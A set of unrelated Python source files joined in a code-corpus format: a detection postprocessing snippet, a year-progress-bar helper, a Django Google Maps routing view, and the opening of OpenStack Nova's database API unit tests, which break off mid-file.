for results_per_image, input_per_image, image_size in zip(
results, batched_inputs, images.image_sizes
):
height = input_per_image.get("height", image_size[0])
width = input_per_image.get("width", image_size[1])
processed_results = detector_postprocess(results_per_image, height, width)
return processed_results
|
py | b400289fab2b84fb2a4d172a04dad2d22e9f0674 | """ TIMEFLIESBAR PROGRESS_BAR FUNCTION """
# Contact.
# [email protected]
# ---------------------------------------------------------------------------#
# Pass-through variables.
tm: int
""" total_minutes from tfb_calculus. """
gm: int
""" gone_minutes from tfb_calculus. """
# Regular variables.
percent_decimals: int
""" Decimals to show on percentages. """
bar_length: int
""" Bar length. """
bar_fill: str
""" Character for filled bar. """
not_fill: str
""" Character for not filled bar. """
percent_right: int
""" Percentage of the year left (printed on the right of the bar). """
percent_left: int
""" Percentage of the year gone (printed on the left of the bar). """
filled_length: int
""" Length for filled bar. """
not_filled_length: int
""" Length for not filled bar. """
bar: str
""" Progress bar representation. """
progressbar: str
""" Progress bar printing. """
# ---------------------------------------------------------------------------#
# Build the progress bar string showing the gone and left percentages.
def progress_bar(tm, gm, percent_decimals = 2, bar_length=12, bar_fill = "░", not_fill = "▓"):
percent_right = ("{0:." + str(percent_decimals) + "f}").format(100 - (100 * (gm / int(tm))))
percent_left = ("{0:." + str(percent_decimals) + "f}").format(100 * (gm / int(tm)))
filled_length = int(bar_length * gm // tm)
not_filled_length = int(bar_length - filled_length)
bar = bar_fill * filled_length + not_fill * not_filled_length
progressbar = f"{percent_left}% Gone {bar} Left {percent_right}%"
return progressbar
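# Worked example (hypothetical values): progress_bar(1440, 360) gives
# filled_length = 12 * 360 // 1440 = 3, so it returns
# "25.00% Gone ░░░▓▓▓▓▓▓▓▓▓ Left 75.00%".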
|
py | b400292e2b080f1144509877699d28fd1b1e9407 | from django.shortcuts import render, redirect, reverse
from django.conf import settings
from django_google_api.mixins import Directions
'''
Basic view for routing
'''
def route(request):
context = {
"google_api_key": settings.GOOGLE_API_KEY,
"base_country": settings.BASE_COUNTRY}
return render(request, 'main/route.html', context)
'''
Basic view for displaying a map
'''
def map(request):
lat_a = request.GET.get("lat_a", None)
long_a = request.GET.get("long_a", None)
lat_b = request.GET.get("lat_b", None)
long_b = request.GET.get("long_b", None)
lat_c = request.GET.get("lat_c", None)
long_c = request.GET.get("long_c", None)
lat_d = request.GET.get("lat_d", None)
long_d = request.GET.get("long_d", None)
#only call API if all 4 addresses are added
if lat_a and lat_b and lat_c and lat_d:
directions = Directions(
lat_a= lat_a,
long_a=long_a,
lat_b = lat_b,
long_b=long_b,
lat_c= lat_c,
long_c=long_c,
lat_d = lat_d,
long_d=long_d
)
else:
return redirect(reverse('main:route'))
context = {
"google_api_key": settings.GOOGLE_API_KEY,
"base_country": settings.BASE_COUNTRY,
"lat_a": lat_a,
"long_a": long_a,
"lat_b": lat_b,
"long_b": long_b,
"lat_c": lat_c,
"long_c": long_c,
"lat_d": lat_d,
"long_d": long_d,
"origin": f'{lat_a}, {long_a}',
"destination": f'{lat_b}, {long_b}',
"directions": directions,
}
return render(request, 'main/map.html', context) |
py | b40029fe10f993be8c475dfe864c68c4d8a4bc4c | # encoding=UTF8
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Unit tests for the DB API."""
import copy
import datetime
import types
import uuid as stdlib_uuid
import iso8601
import mock
import netaddr
from oslo_config import cfg
from oslo_db import exception as db_exc
from oslo_db.sqlalchemy import test_base
from oslo_db.sqlalchemy import utils as sqlalchemyutils
from oslo_serialization import jsonutils
from oslo_utils import timeutils
import six
from sqlalchemy import Column
from sqlalchemy.dialects import sqlite
from sqlalchemy import inspect
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy.orm import query
from sqlalchemy import sql
from sqlalchemy import Table
from nova import block_device
from nova.compute import arch
from nova.compute import flavors
from nova.compute import task_states
from nova.compute import vm_states
from nova import context
from nova import db
from nova.db.sqlalchemy import api as sqlalchemy_api
from nova.db.sqlalchemy import models
from nova.db.sqlalchemy import types as col_types
from nova.db.sqlalchemy import utils as db_utils
from nova import exception
from nova import objects
from nova.objects import base as obj_base
from nova.openstack.common import uuidutils
from nova import quota
from nova import test
from nova.tests.unit import matchers
from nova import utils
CONF = cfg.CONF
CONF.import_opt('reserved_host_memory_mb', 'nova.compute.resource_tracker')
CONF.import_opt('reserved_host_disk_mb', 'nova.compute.resource_tracker')
get_engine = sqlalchemy_api.get_engine
get_session = sqlalchemy_api.get_session
def _reservation_get(context, uuid):
result = sqlalchemy_api.model_query(context, models.Reservation,
read_deleted="no").filter_by(uuid=uuid).first()
if not result:
raise exception.ReservationNotFound(uuid=uuid)
return result
def _quota_reserve(context, project_id, user_id):
"""Create sample Quota, QuotaUsage and Reservation objects.
There is no method db.quota_usage_create(), so we have to use
db.quota_reserve() for creating QuotaUsage objects.
Returns reservations uuids.
"""
def get_sync(resource, usage):
def sync(elevated, project_id, user_id, session):
return {resource: usage}
return sync
quotas = {}
user_quotas = {}
resources = {}
deltas = {}
for i in range(3):
resource = 'resource%d' % i
if i == 2:
# test for project level resources
resource = 'fixed_ips'
quotas[resource] = db.quota_create(context,
project_id, resource, i)
user_quotas[resource] = quotas[resource]
else:
quotas[resource] = db.quota_create(context,
project_id, resource, i)
user_quotas[resource] = db.quota_create(context, project_id,
resource, i,
user_id=user_id)
sync_name = '_sync_%s' % resource
resources[resource] = quota.ReservableResource(
resource, sync_name, 'quota_res_%d' % i)
deltas[resource] = i
setattr(sqlalchemy_api, sync_name, get_sync(resource, i))
sqlalchemy_api.QUOTA_SYNC_FUNCTIONS[sync_name] = getattr(
sqlalchemy_api, sync_name)
return db.quota_reserve(context, resources, quotas, user_quotas, deltas,
timeutils.utcnow(), CONF.until_refresh,
datetime.timedelta(days=1), project_id, user_id)
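# Illustrative usage in the tests below: reservations = _quota_reserve(ctxt,
# 'project1', 'user1') returns one reservation uuid per resource delta, and
# each uuid can be looked up again with _reservation_get(ctxt, uuid).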
class DbTestCase(test.TestCase):
def setUp(self):
super(DbTestCase, self).setUp()
self.user_id = 'fake'
self.project_id = 'fake'
self.context = context.RequestContext(self.user_id, self.project_id)
def create_instance_with_args(self, **kwargs):
args = {'reservation_id': 'a', 'image_ref': 1, 'host': 'host1',
'node': 'node1', 'project_id': self.project_id,
'vm_state': 'fake'}
if 'context' in kwargs:
ctxt = kwargs.pop('context')
args['project_id'] = ctxt.project_id
else:
ctxt = self.context
args.update(kwargs)
return db.instance_create(ctxt, args)
def fake_metadata(self, content):
meta = {}
for i in range(0, 10):
meta["foo%i" % i] = "this is %s item %i" % (content, i)
return meta
def create_metadata_for_instance(self, instance_uuid):
meta = self.fake_metadata('metadata')
db.instance_metadata_update(self.context, instance_uuid, meta, False)
sys_meta = self.fake_metadata('system_metadata')
db.instance_system_metadata_update(self.context, instance_uuid,
sys_meta, False)
return meta, sys_meta
class DecoratorTestCase(test.TestCase):
def _test_decorator_wraps_helper(self, decorator):
def test_func():
"""Test docstring."""
decorated_func = decorator(test_func)
self.assertEqual(test_func.func_name, decorated_func.func_name)
self.assertEqual(test_func.__doc__, decorated_func.__doc__)
self.assertEqual(test_func.__module__, decorated_func.__module__)
def test_require_context_decorator_wraps_functions_properly(self):
self._test_decorator_wraps_helper(sqlalchemy_api.require_context)
def test_require_admin_context_decorator_wraps_functions_properly(self):
self._test_decorator_wraps_helper(sqlalchemy_api.require_admin_context)
def test_require_deadlock_retry_wraps_functions_properly(self):
self._test_decorator_wraps_helper(sqlalchemy_api._retry_on_deadlock)
def _get_fake_aggr_values():
return {'name': 'fake_aggregate'}
def _get_fake_aggr_metadata():
return {'fake_key1': 'fake_value1',
'fake_key2': 'fake_value2',
'availability_zone': 'fake_avail_zone'}
def _get_fake_aggr_hosts():
return ['foo.openstack.org']
def _create_aggregate(context=context.get_admin_context(),
values=_get_fake_aggr_values(),
metadata=_get_fake_aggr_metadata()):
return db.aggregate_create(context, values, metadata)
def _create_aggregate_with_hosts(context=context.get_admin_context(),
values=_get_fake_aggr_values(),
metadata=_get_fake_aggr_metadata(),
hosts=_get_fake_aggr_hosts()):
result = _create_aggregate(context=context,
values=values, metadata=metadata)
for host in hosts:
db.aggregate_host_add(context, result['id'], host)
return result
class NotDbApiTestCase(DbTestCase):
def setUp(self):
super(NotDbApiTestCase, self).setUp()
self.flags(connection='notdb://', group='database')
def test_instance_get_all_by_filters_regex_unsupported_db(self):
# Ensure that the 'LIKE' operator is used for unsupported dbs.
self.create_instance_with_args(display_name='test1')
self.create_instance_with_args(display_name='test2')
self.create_instance_with_args(display_name='diff')
result = db.instance_get_all_by_filters(self.context,
{'display_name': 'test'})
self.assertEqual(2, len(result))
result = db.instance_get_all_by_filters(self.context,
{'display_name': 'di'})
self.assertEqual(1, len(result))
def test_instance_get_all_by_filters_paginate(self):
test1 = self.create_instance_with_args(display_name='test1')
test2 = self.create_instance_with_args(display_name='test2')
test3 = self.create_instance_with_args(display_name='test3')
result = db.instance_get_all_by_filters(self.context,
{'display_name': '%test%'},
marker=None)
self.assertEqual(3, len(result))
result = db.instance_get_all_by_filters(self.context,
{'display_name': '%test%'},
sort_dir="asc",
marker=test1['uuid'])
self.assertEqual(2, len(result))
result = db.instance_get_all_by_filters(self.context,
{'display_name': '%test%'},
sort_dir="asc",
marker=test2['uuid'])
self.assertEqual(1, len(result))
result = db.instance_get_all_by_filters(self.context,
{'display_name': '%test%'},
sort_dir="asc",
marker=test3['uuid'])
self.assertEqual(0, len(result))
self.assertRaises(exception.MarkerNotFound,
db.instance_get_all_by_filters,
self.context, {'display_name': '%test%'},
marker=str(stdlib_uuid.uuid4()))
def _assert_equals_inst_order(self, correct_order, filters,
sort_keys=None, sort_dirs=None,
limit=None, marker=None,
match_keys=['uuid', 'vm_state',
'display_name', 'id']):
'''Retrieves instances based on the given filters and sorting
information and verifies that the instances are returned in the
correct sorted order by ensuring that the supplied keys match.
'''
result = db.instance_get_all_by_filters_sort(
self.context, filters, limit=limit, marker=marker,
sort_keys=sort_keys, sort_dirs=sort_dirs)
self.assertEqual(len(correct_order), len(result))
for inst1, inst2 in zip(result, correct_order):
for key in match_keys:
self.assertEqual(inst1.get(key), inst2.get(key))
return result
def test_instance_get_all_by_filters_sort_keys(self):
'''Verifies sort order and direction for multiple instances.'''
# Instances that will reply to the query
test1_active = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ACTIVE)
test1_error = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ERROR)
test1_error2 = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ERROR)
test2_active = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ACTIVE)
test2_error = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ERROR)
test2_error2 = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ERROR)
# Other instances in the DB, will not match name filter
other_error = self.create_instance_with_args(
display_name='other',
vm_state=vm_states.ERROR)
other_active = self.create_instance_with_args(
display_name='other',
vm_state=vm_states.ACTIVE)
filters = {'display_name': '%test%'}
# Verify different sort key/direction combinations
sort_keys = ['display_name', 'vm_state', 'created_at']
sort_dirs = ['asc', 'asc', 'asc']
correct_order = [test1_active, test1_error, test1_error2,
test2_active, test2_error, test2_error2]
self._assert_equals_inst_order(correct_order, filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
sort_dirs = ['asc', 'desc', 'asc']
correct_order = [test1_error, test1_error2, test1_active,
test2_error, test2_error2, test2_active]
self._assert_equals_inst_order(correct_order, filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
sort_dirs = ['desc', 'desc', 'asc']
correct_order = [test2_error, test2_error2, test2_active,
test1_error, test1_error2, test1_active]
self._assert_equals_inst_order(correct_order, filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
# created_at is added by default if not supplied, descending order
sort_keys = ['display_name', 'vm_state']
sort_dirs = ['desc', 'desc']
correct_order = [test2_error2, test2_error, test2_active,
test1_error2, test1_error, test1_active]
self._assert_equals_inst_order(correct_order, filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
# Now created_at should be in ascending order (defaults to the first
# sort dir direction)
sort_dirs = ['asc', 'asc']
correct_order = [test1_active, test1_error, test1_error2,
test2_active, test2_error, test2_error2]
self._assert_equals_inst_order(correct_order, filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
# Remove name filter, get all instances
correct_order = [other_active, other_error,
test1_active, test1_error, test1_error2,
test2_active, test2_error, test2_error2]
self._assert_equals_inst_order(correct_order, {},
sort_keys=sort_keys,
sort_dirs=sort_dirs)
# Default sorting, 'created_at' then 'id' in desc order
correct_order = [other_active, other_error,
test2_error2, test2_error, test2_active,
test1_error2, test1_error, test1_active]
self._assert_equals_inst_order(correct_order, {})
def test_instance_get_all_by_filters_sort_keys_paginate(self):
'''Verifies sort order with pagination.'''
# Instances that will reply to the query
test1_active = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ACTIVE)
test1_error = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ERROR)
test1_error2 = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ERROR)
test2_active = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ACTIVE)
test2_error = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ERROR)
test2_error2 = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ERROR)
# Other instances in the DB, will not match name filter
self.create_instance_with_args(display_name='other')
self.create_instance_with_args(display_name='other')
filters = {'display_name': '%test%'}
# Common sort information for every query
sort_keys = ['display_name', 'vm_state', 'created_at']
sort_dirs = ['asc', 'desc', 'asc']
# Overall correct instance order based on the sort keys
correct_order = [test1_error, test1_error2, test1_active,
test2_error, test2_error2, test2_active]
# Limits of 1, 2, and 3, verify that the instances returned are in the
# correct sorted order, update the marker to get the next correct page
for limit in range(1, 4):
marker = None
# Include the maximum number of instances (ie, 6) to ensure that
# the last query (with marker pointing to the last instance)
# returns 0 servers
for i in range(0, 7, limit):
if i == len(correct_order):
correct = []
else:
correct = correct_order[i:i + limit]
insts = self._assert_equals_inst_order(
correct, filters,
sort_keys=sort_keys, sort_dirs=sort_dirs,
limit=limit, marker=marker)
if correct:
marker = insts[-1]['uuid']
self.assertEqual(correct[-1]['uuid'], marker)
def test_instance_get_all_by_filters_sort_key_invalid(self):
'''InvalidSortKey raised if an invalid key is given.'''
for keys in [['foo'], ['uuid', 'foo']]:
self.assertRaises(exception.InvalidSortKey,
db.instance_get_all_by_filters_sort,
self.context,
filters={},
sort_keys=keys)
def test_convert_objects_related_datetimes(self):
t1 = timeutils.utcnow()
t2 = t1 + datetime.timedelta(seconds=10)
t3 = t2 + datetime.timedelta(hours=1)
t2_utc = t2.replace(tzinfo=iso8601.iso8601.Utc())
t3_utc = t3.replace(tzinfo=iso8601.iso8601.Utc())
datetime_keys = ('created_at', 'deleted_at')
test1 = {'created_at': t1, 'deleted_at': t2, 'updated_at': t3}
expected_dict = {'created_at': t1, 'deleted_at': t2, 'updated_at': t3}
sqlalchemy_api.convert_objects_related_datetimes(test1, *datetime_keys)
self.assertEqual(test1, expected_dict)
test2 = {'created_at': t1, 'deleted_at': t2_utc, 'updated_at': t3}
expected_dict = {'created_at': t1, 'deleted_at': t2, 'updated_at': t3}
sqlalchemy_api.convert_objects_related_datetimes(test2, *datetime_keys)
self.assertEqual(test2, expected_dict)
test3 = {'deleted_at': t2_utc, 'updated_at': t3_utc}
expected_dict = {'deleted_at': t2, 'updated_at': t3_utc}
sqlalchemy_api.convert_objects_related_datetimes(test3, *datetime_keys)
self.assertEqual(test3, expected_dict)
def test_model_query_invalid_arguments(self):
# read_deleted shouldn't accept invalid values
self.assertRaises(ValueError, sqlalchemy_api.model_query,
self.context, models.Instance, read_deleted=False)
self.assertRaises(ValueError, sqlalchemy_api.model_query,
self.context, models.Instance, read_deleted="foo")
# Check model is a valid model
self.assertRaises(TypeError, sqlalchemy_api.model_query,
self.context, "")
@mock.patch.object(sqlalchemy_api, 'get_session')
def test_model_query_use_slave_false(self, mock_get_session):
sqlalchemy_api.model_query(self.context, models.Instance,
use_slave=False)
mock_get_session.assert_called_once_with(use_slave=False)
@mock.patch.object(sqlalchemy_api, 'get_session')
def test_model_query_use_slave_no_slave_connection(self, mock_get_session):
self.flags(slave_connection='', group='database')
sqlalchemy_api.model_query(self.context, models.Instance,
use_slave=True)
mock_get_session.assert_called_once_with(use_slave=False)
@mock.patch.object(sqlalchemy_api, 'get_session')
def test_model_query_use_slave_true(self, mock_get_session):
self.flags(slave_connection='foo://bar', group='database')
sqlalchemy_api.model_query(self.context, models.Instance,
use_slave=True)
mock_get_session.assert_called_once_with(use_slave=True)
@mock.patch.object(sqlalchemy_api, 'get_session')
def test_model_query_lazy_session_default(self, mock_get_session):
sqlalchemy_api.model_query(self.context, models.Instance,
session=mock.MagicMock())
self.assertFalse(mock_get_session.called)
class AggregateDBApiTestCase(test.TestCase):
def setUp(self):
super(AggregateDBApiTestCase, self).setUp()
self.user_id = 'fake'
self.project_id = 'fake'
self.context = context.RequestContext(self.user_id, self.project_id)
def test_aggregate_create_no_metadata(self):
result = _create_aggregate(metadata=None)
self.assertEqual(result['name'], 'fake_aggregate')
def test_aggregate_create_avoid_name_conflict(self):
r1 = _create_aggregate(metadata=None)
db.aggregate_delete(context.get_admin_context(), r1['id'])
values = {'name': r1['name']}
metadata = {'availability_zone': 'new_zone'}
r2 = _create_aggregate(values=values, metadata=metadata)
self.assertEqual(r2['name'], values['name'])
self.assertEqual(r2['availability_zone'],
metadata['availability_zone'])
def test_aggregate_create_raise_exist_exc(self):
_create_aggregate(metadata=None)
self.assertRaises(exception.AggregateNameExists,
_create_aggregate, metadata=None)
def test_aggregate_get_raise_not_found(self):
ctxt = context.get_admin_context()
# this does not exist!
aggregate_id = 1
self.assertRaises(exception.AggregateNotFound,
db.aggregate_get,
ctxt, aggregate_id)
def test_aggregate_metadata_get_raise_not_found(self):
ctxt = context.get_admin_context()
# this does not exist!
aggregate_id = 1
self.assertRaises(exception.AggregateNotFound,
db.aggregate_metadata_get,
ctxt, aggregate_id)
def test_aggregate_create_with_metadata(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
expected_metadata = db.aggregate_metadata_get(ctxt, result['id'])
self.assertThat(expected_metadata,
matchers.DictMatches(_get_fake_aggr_metadata()))
def test_aggregate_create_delete_create_with_metadata(self):
# test for bug 1052479
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
expected_metadata = db.aggregate_metadata_get(ctxt, result['id'])
self.assertThat(expected_metadata,
matchers.DictMatches(_get_fake_aggr_metadata()))
db.aggregate_delete(ctxt, result['id'])
result = _create_aggregate(metadata={'availability_zone':
'fake_avail_zone'})
expected_metadata = db.aggregate_metadata_get(ctxt, result['id'])
self.assertEqual(expected_metadata, {'availability_zone':
'fake_avail_zone'})
def test_aggregate_get(self):
ctxt = context.get_admin_context()
result = _create_aggregate_with_hosts(context=ctxt)
expected = db.aggregate_get(ctxt, result['id'])
self.assertEqual(_get_fake_aggr_hosts(), expected['hosts'])
self.assertEqual(_get_fake_aggr_metadata(), expected['metadetails'])
def test_aggregate_get_by_host(self):
ctxt = context.get_admin_context()
values2 = {'name': 'fake_aggregate2'}
values3 = {'name': 'fake_aggregate3'}
values4 = {'name': 'fake_aggregate4'}
values5 = {'name': 'fake_aggregate5'}
a1 = _create_aggregate_with_hosts(context=ctxt)
a2 = _create_aggregate_with_hosts(context=ctxt, values=values2)
# a3 has no hosts and should not be in the results.
_create_aggregate(context=ctxt, values=values3)
# a4 has no matching hosts.
_create_aggregate_with_hosts(context=ctxt, values=values4,
hosts=['foo4.openstack.org'])
# a5 has no matching hosts after deleting the only matching host.
a5 = _create_aggregate_with_hosts(context=ctxt, values=values5,
hosts=['foo5.openstack.org', 'foo.openstack.org'])
db.aggregate_host_delete(ctxt, a5['id'],
'foo.openstack.org')
r1 = db.aggregate_get_by_host(ctxt, 'foo.openstack.org')
self.assertEqual([a1['id'], a2['id']], [x['id'] for x in r1])
def test_aggregate_get_by_host_with_key(self):
ctxt = context.get_admin_context()
values2 = {'name': 'fake_aggregate2'}
values3 = {'name': 'fake_aggregate3'}
values4 = {'name': 'fake_aggregate4'}
a1 = _create_aggregate_with_hosts(context=ctxt,
metadata={'goodkey': 'good'})
_create_aggregate_with_hosts(context=ctxt, values=values2)
_create_aggregate(context=ctxt, values=values3)
_create_aggregate_with_hosts(context=ctxt, values=values4,
hosts=['foo4.openstack.org'], metadata={'goodkey': 'bad'})
# filter result by key
r1 = db.aggregate_get_by_host(ctxt, 'foo.openstack.org', key='goodkey')
self.assertEqual([a1['id']], [x['id'] for x in r1])
def test_aggregate_metadata_get_by_host(self):
ctxt = context.get_admin_context()
values = {'name': 'fake_aggregate2'}
values2 = {'name': 'fake_aggregate3'}
_create_aggregate_with_hosts(context=ctxt)
_create_aggregate_with_hosts(context=ctxt, values=values)
_create_aggregate_with_hosts(context=ctxt, values=values2,
hosts=['bar.openstack.org'], metadata={'badkey': 'bad'})
r1 = db.aggregate_metadata_get_by_host(ctxt, 'foo.openstack.org')
self.assertEqual(r1['fake_key1'], set(['fake_value1']))
self.assertNotIn('badkey', r1)
def test_aggregate_metadata_get_by_metadata_key(self):
ctxt = context.get_admin_context()
values = {'aggregate_id': 'fake_id',
'name': 'fake_aggregate'}
aggr = _create_aggregate_with_hosts(context=ctxt, values=values,
hosts=['bar.openstack.org'],
metadata={'availability_zone':
'az1'})
r1 = db.aggregate_metadata_get_by_metadata_key(ctxt, aggr['id'],
'availability_zone')
self.assertEqual(r1['availability_zone'], set(['az1']))
self.assertIn('availability_zone', r1)
self.assertNotIn('name', r1)
def test_aggregate_metadata_get_by_host_with_key(self):
ctxt = context.get_admin_context()
values2 = {'name': 'fake_aggregate12'}
values3 = {'name': 'fake_aggregate23'}
a2_hosts = ['foo1.openstack.org', 'foo2.openstack.org']
a2_metadata = {'good': 'value12', 'bad': 'badvalue12'}
a3_hosts = ['foo2.openstack.org', 'foo3.openstack.org']
a3_metadata = {'good': 'value23', 'bad': 'badvalue23'}
_create_aggregate_with_hosts(context=ctxt)
_create_aggregate_with_hosts(context=ctxt, values=values2,
hosts=a2_hosts, metadata=a2_metadata)
a3 = _create_aggregate_with_hosts(context=ctxt, values=values3,
hosts=a3_hosts, metadata=a3_metadata)
r1 = db.aggregate_metadata_get_by_host(ctxt, 'foo2.openstack.org',
key='good')
self.assertEqual(r1['good'], set(['value12', 'value23']))
self.assertNotIn('fake_key1', r1)
self.assertNotIn('bad', r1)
# Delete metadata
db.aggregate_metadata_delete(ctxt, a3['id'], 'good')
r2 = db.aggregate_metadata_get_by_host(ctxt, 'foo3.openstack.org',
key='good')
self.assertNotIn('good', r2)
def test_aggregate_get_by_host_not_found(self):
ctxt = context.get_admin_context()
_create_aggregate_with_hosts(context=ctxt)
self.assertEqual([], db.aggregate_get_by_host(ctxt, 'unknown_host'))
def test_aggregate_delete_raise_not_found(self):
ctxt = context.get_admin_context()
# this does not exist!
aggregate_id = 1
self.assertRaises(exception.AggregateNotFound,
db.aggregate_delete,
ctxt, aggregate_id)
def test_aggregate_delete(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata=None)
db.aggregate_delete(ctxt, result['id'])
expected = db.aggregate_get_all(ctxt)
self.assertEqual(0, len(expected))
aggregate = db.aggregate_get(ctxt.elevated(read_deleted='yes'),
result['id'])
self.assertEqual(aggregate['deleted'], result['id'])
def test_aggregate_update(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata={'availability_zone':
'fake_avail_zone'})
self.assertEqual(result['availability_zone'], 'fake_avail_zone')
new_values = _get_fake_aggr_values()
new_values['availability_zone'] = 'different_avail_zone'
updated = db.aggregate_update(ctxt, result['id'], new_values)
self.assertNotEqual(result['availability_zone'],
updated['availability_zone'])
def test_aggregate_update_with_metadata(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata=None)
values = _get_fake_aggr_values()
values['metadata'] = _get_fake_aggr_metadata()
values['availability_zone'] = 'different_avail_zone'
db.aggregate_update(ctxt, result['id'], values)
expected = db.aggregate_metadata_get(ctxt, result['id'])
updated = db.aggregate_get(ctxt, result['id'])
self.assertThat(values['metadata'],
matchers.DictMatches(expected))
self.assertNotEqual(result['availability_zone'],
updated['availability_zone'])
def test_aggregate_update_with_existing_metadata(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
values = _get_fake_aggr_values()
values['metadata'] = _get_fake_aggr_metadata()
values['metadata']['fake_key1'] = 'foo'
db.aggregate_update(ctxt, result['id'], values)
expected = db.aggregate_metadata_get(ctxt, result['id'])
self.assertThat(values['metadata'], matchers.DictMatches(expected))
def test_aggregate_update_zone_with_existing_metadata(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
new_zone = {'availability_zone': 'fake_avail_zone_2'}
metadata = _get_fake_aggr_metadata()
metadata.update(new_zone)
db.aggregate_update(ctxt, result['id'], new_zone)
expected = db.aggregate_metadata_get(ctxt, result['id'])
self.assertThat(metadata, matchers.DictMatches(expected))
def test_aggregate_update_raise_not_found(self):
ctxt = context.get_admin_context()
# this does not exist!
aggregate_id = 1
new_values = _get_fake_aggr_values()
self.assertRaises(exception.AggregateNotFound,
db.aggregate_update, ctxt, aggregate_id, new_values)
def test_aggregate_update_raise_name_exist(self):
ctxt = context.get_admin_context()
_create_aggregate(context=ctxt, values={'name': 'test1'},
metadata={'availability_zone': 'fake_avail_zone'})
_create_aggregate(context=ctxt, values={'name': 'test2'},
metadata={'availability_zone': 'fake_avail_zone'})
aggregate_id = 1
new_values = {'name': 'test2'}
self.assertRaises(exception.AggregateNameExists,
db.aggregate_update, ctxt, aggregate_id, new_values)
def test_aggregate_get_all(self):
ctxt = context.get_admin_context()
counter = 3
for c in range(counter):
_create_aggregate(context=ctxt,
values={'name': 'fake_aggregate_%d' % c},
metadata=None)
results = db.aggregate_get_all(ctxt)
self.assertEqual(len(results), counter)
def test_aggregate_get_all_non_deleted(self):
ctxt = context.get_admin_context()
add_counter = 5
remove_counter = 2
aggregates = []
for c in range(1, add_counter):
values = {'name': 'fake_aggregate_%d' % c}
aggregates.append(_create_aggregate(context=ctxt,
values=values, metadata=None))
for c in range(1, remove_counter):
db.aggregate_delete(ctxt, aggregates[c - 1]['id'])
results = db.aggregate_get_all(ctxt)
self.assertEqual(len(results), add_counter - remove_counter)
def test_aggregate_metadata_add(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata=None)
metadata = _get_fake_aggr_metadata()
db.aggregate_metadata_add(ctxt, result['id'], metadata)
expected = db.aggregate_metadata_get(ctxt, result['id'])
self.assertThat(metadata, matchers.DictMatches(expected))
def test_aggregate_metadata_add_and_update(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
metadata = _get_fake_aggr_metadata()
key = metadata.keys()[0]
new_metadata = {key: 'foo',
'fake_new_key': 'fake_new_value'}
metadata.update(new_metadata)
db.aggregate_metadata_add(ctxt, result['id'], new_metadata)
expected = db.aggregate_metadata_get(ctxt, result['id'])
self.assertThat(metadata, matchers.DictMatches(expected))
def test_aggregate_metadata_add_retry(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata=None)
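        # Stub the metadata query to always raise DBDuplicateEntry while
        # counting calls, so aggregate_metadata_add exhausts its retry
        # budget.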
def counted():
def get_query(context, id, session, read_deleted):
get_query.counter += 1
raise db_exc.DBDuplicateEntry
get_query.counter = 0
return get_query
get_query = counted()
self.stubs.Set(sqlalchemy_api,
'_aggregate_metadata_get_query', get_query)
self.assertRaises(db_exc.DBDuplicateEntry, sqlalchemy_api.
aggregate_metadata_add, ctxt, result['id'], {},
max_retries=5)
self.assertEqual(get_query.counter, 5)
def test_aggregate_metadata_update(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
metadata = _get_fake_aggr_metadata()
key = metadata.keys()[0]
db.aggregate_metadata_delete(ctxt, result['id'], key)
new_metadata = {key: 'foo'}
db.aggregate_metadata_add(ctxt, result['id'], new_metadata)
expected = db.aggregate_metadata_get(ctxt, result['id'])
metadata[key] = 'foo'
self.assertThat(metadata, matchers.DictMatches(expected))
def test_aggregate_metadata_delete(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata=None)
metadata = _get_fake_aggr_metadata()
db.aggregate_metadata_add(ctxt, result['id'], metadata)
db.aggregate_metadata_delete(ctxt, result['id'], metadata.keys()[0])
expected = db.aggregate_metadata_get(ctxt, result['id'])
del metadata[metadata.keys()[0]]
self.assertThat(metadata, matchers.DictMatches(expected))
def test_aggregate_remove_availability_zone(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata={'availability_zone':
'fake_avail_zone'})
db.aggregate_metadata_delete(ctxt, result['id'], 'availability_zone')
expected = db.aggregate_metadata_get(ctxt, result['id'])
aggregate = db.aggregate_get(ctxt, result['id'])
self.assertIsNone(aggregate['availability_zone'])
self.assertThat({}, matchers.DictMatches(expected))
def test_aggregate_metadata_delete_raise_not_found(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
self.assertRaises(exception.AggregateMetadataNotFound,
db.aggregate_metadata_delete,
ctxt, result['id'], 'foo_key')
def test_aggregate_host_add(self):
